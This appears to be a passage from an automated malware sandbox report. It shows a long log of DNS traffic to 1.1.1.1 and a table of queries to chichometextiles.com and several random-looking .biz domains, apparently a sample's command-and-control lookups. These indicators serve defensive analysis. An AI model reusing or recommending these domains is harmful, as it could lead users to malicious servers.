                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:12.924976110 CET53566621.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:13.797549963 CET5728153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:13.814912081 CET5728153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:13.981000900 CET53572811.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:13.981044054 CET53572811.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.327754974 CET6043653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.334872007 CET53604361.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.450589895 CET5082553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:15.457926989 CET53508251.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:16.316668987 CET5621553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:16.324074984 CET53562151.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:16.999447107 CET6484853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:17.007205009 CET53648481.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:17.686850071 CET5668553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:17.693931103 CET53566851.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:18.890088081 CET5372853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:18.899774075 CET53537281.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:19.885596037 CET6252253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:19.893357038 CET53625221.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:20.749533892 CET6307453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:20.757082939 CET53630741.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:21.431845903 CET5728953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:21.439529896 CET53572891.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:22.279710054 CET6002553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:22.287223101 CET53600251.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:23.158626080 CET5841753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:23.167500019 CET53584171.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:24.020437002 CET5826653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:24.028562069 CET53582661.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:25.485054970 CET5270953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:25.492696047 CET53527091.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:26.329550028 CET6044853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:26.336951971 CET53604481.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:27.017206907 CET4984653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:27.024624109 CET53498461.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:27.890141010 CET5867553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:27.898423910 CET53586751.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:27.901947021 CET5370653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:27.909406900 CET53537061.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:29.371723890 CET5625453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:29.379189968 CET53562541.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:29.379741907 CET5179353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:29.386789083 CET53517931.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:29.391716003 CET5491053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:29.399000883 CET53549101.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:32.344156981 CET5131253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:32.352125883 CET53513121.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:33.828330994 CET6197253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:33.835798979 CET53619721.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.206325054 CET5482353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.214323997 CET53548231.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.287723064 CET5411053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.295032024 CET53541101.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.984488010 CET5898653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.991656065 CET53589861.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:37.432199955 CET6317453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:37.439444065 CET53631741.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:38.805805922 CET5697153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:38.812618017 CET53569711.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:39.813663960 CET4950953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:39.821398020 CET53495091.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:40.507563114 CET5940253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:40.515240908 CET53594021.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:41.697293997 CET5487153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:41.704456091 CET53548711.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.153661013 CET5143353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.175275087 CET5143353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.253243923 CET53514331.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.253258944 CET53514331.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:44.013878107 CET5495453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:44.021461964 CET53549541.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.215331078 CET5871053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.222269058 CET53587101.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.081593037 CET6043053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.089057922 CET53604301.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.762034893 CET6337953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.769203901 CET53633791.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.667279959 CET5880553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.674583912 CET53588051.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.698772907 CET6126553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.706001043 CET53612651.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:48.529159069 CET6149253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:48.536720037 CET53614921.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.185100079 CET5393253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.192956924 CET53539321.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.351147890 CET5148653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.377450943 CET5148653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.450458050 CET53514861.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:49.450473070 CET53514861.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.290489912 CET5175353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.297688007 CET53517531.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.633656025 CET6016753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:50.641279936 CET53601671.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.139195919 CET6444253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.146872997 CET53644421.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.890988111 CET6121453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.898390055 CET53612141.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.579372883 CET6548353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.587099075 CET53654831.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.262933969 CET5663753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.272310019 CET53566371.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.349551916 CET6516453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.358274937 CET53651641.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.945874929 CET6097853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.953687906 CET53609781.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.716589928 CET6236953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:54.723918915 CET53623691.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.404062986 CET5290753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.411676884 CET53529071.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.412244081 CET6348353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:55.419398069 CET53634831.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.208795071 CET5572653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.218442917 CET53557261.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.258645058 CET5421853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.266259909 CET53542181.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.934010029 CET5389153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:56.955621004 CET5389153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.119230986 CET53538911.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.119297028 CET53538911.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.936430931 CET6047353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.944817066 CET53604731.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.577095985 CET6034453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.584604979 CET53603441.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.733731031 CET5412853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:58.740854025 CET53541281.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.047586918 CET5434953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.054765940 CET53543491.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.685167074 CET5931953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.692641973 CET53593191.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.909759998 CET5941053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:00.917864084 CET53594101.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:01.360688925 CET5633353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:01.368314028 CET53563331.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.211487055 CET6533153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.218394995 CET53653311.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.430663109 CET6325153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.437629938 CET53632511.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.088689089 CET6139753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.097129107 CET53613971.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.889435053 CET6257553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.896572113 CET53625751.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.946604967 CET5533353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.954758883 CET53553331.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.747503042 CET4948153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.754592896 CET53494811.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.844434977 CET6349253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.851629972 CET53634921.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:05.441349030 CET5246253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:05.449150085 CET53524621.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:05.705645084 CET5683153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:05.715600014 CET53568311.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:06.280689001 CET6002753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:06.288481951 CET53600271.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:06.521934032 CET4929653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:06.530035973 CET53492961.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:07.267570019 CET5820753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:07.274724007 CET53582071.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.043463945 CET6200153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.050497055 CET53620011.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.167680025 CET5374853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.175995111 CET53537481.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.919982910 CET5675753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.927023888 CET53567571.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:09.856669903 CET5201053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:09.864259005 CET53520101.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.624634981 CET6004353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.632067919 CET53600431.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.711035967 CET6285153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.737159967 CET6285153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.905204058 CET53628511.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.905220032 CET53628511.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:11.874113083 CET5032453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:11.881300926 CET53503241.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:12.394541979 CET6298953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:12.401694059 CET53629891.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:12.672070026 CET5234853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:12.679670095 CET53523481.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:13.244613886 CET6218953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:13.252080917 CET53621891.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:13.256553888 CET6535953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:13.264271975 CET53653591.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:14.187050104 CET5249053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:14.195065975 CET53524901.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:14.195643902 CET5068953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:14.202857018 CET53506891.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:14.749418974 CET4999153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:14.756660938 CET53499911.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.034600019 CET5449553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.041601896 CET53544951.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.745897055 CET5343953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.753410101 CET53534391.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.884335041 CET6177253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.893826008 CET53617721.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:17.212599039 CET5564253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:17.219635010 CET53556421.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:17.344928980 CET5240153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:17.351780891 CET53524011.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:18.671703100 CET5933653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:18.680030107 CET53593361.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:18.793114901 CET5884653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:18.800503016 CET53588461.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:19.357824087 CET6427153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:19.364727974 CET53642711.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:19.633423090 CET6466353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:19.640556097 CET53646631.1.1.1192.168.2.8

                                                                                                                                                                                                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:16.202035904 CET192.168.2.81.1.1.10x7ba7Standard query (0)chichometextiles.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:22.886229992 CET192.168.2.81.1.1.10x45f5Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:24.065639973 CET192.168.2.81.1.1.10x17ddStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:25.743232012 CET192.168.2.81.1.1.10x4470Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:26.617377996 CET192.168.2.81.1.1.10x8d29Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:27.121980906 CET192.168.2.81.1.1.10xf7d8Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.346524954 CET192.168.2.81.1.1.10x54f6Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.543236971 CET192.168.2.81.1.1.10x4971Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.922425985 CET192.168.2.81.1.1.10xf425Standard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.931761026 CET192.168.2.81.1.1.10xccdaStandard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:30.092627048 CET192.168.2.81.1.1.10x6c48Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.073529959 CET192.168.2.81.1.1.10xea00Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.944441080 CET192.168.2.81.1.1.10x207aStandard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.527856112 CET192.168.2.81.1.1.10xcbc5Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.535969019 CET192.168.2.81.1.1.10xee4aStandard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.543942928 CET192.168.2.81.1.1.10x23d3Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
